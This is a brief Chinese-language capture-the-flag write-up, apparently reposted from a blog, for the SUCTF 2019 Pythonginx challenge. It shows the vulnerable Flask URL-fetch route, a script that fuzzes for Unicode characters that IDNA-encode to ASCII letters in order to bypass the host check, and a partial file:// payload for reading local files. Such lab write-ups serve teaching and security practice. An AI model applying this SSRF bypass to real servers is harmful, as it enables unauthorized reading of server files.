BUUCTF：[SUCTF 2019]Pythonginx

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

对url参数的处理过程如下图所示

利用点在这里urllib.request.urlopen(finalUrl).read()，只要前两次host != suctf.cc，第三次host == suctf.cc即可

而这利用的关键在于newhost.append(h.encode('idna').decode('utf-8'))

编码问题，Unicode的很多字符经过这样的一番编码处理都可以得到正常的字母，脚本fuzz

chars = ['s', 'u', 'c', 't', 'f']
for c in chars:
	for i in range(0x7f, 0x10FFFF):
		try:
			char_i = chr(i).encode('idna').decode('utf-8')
			if char_i == c:
				print('ASCII: {}   Unicode: {}    Number: {}'.format(c, chr(i), i))
		except:
			pass

任意去一个替换['s', 'u', 'c', 't', 'f']其中一个即可绕过

/getUrl?url=file://

标签：SUCTF,getUrl,BUUCTF,suctf,nginx,url,cc,host,2019	

From： https://blog.51cto.com/u_16159500/6517886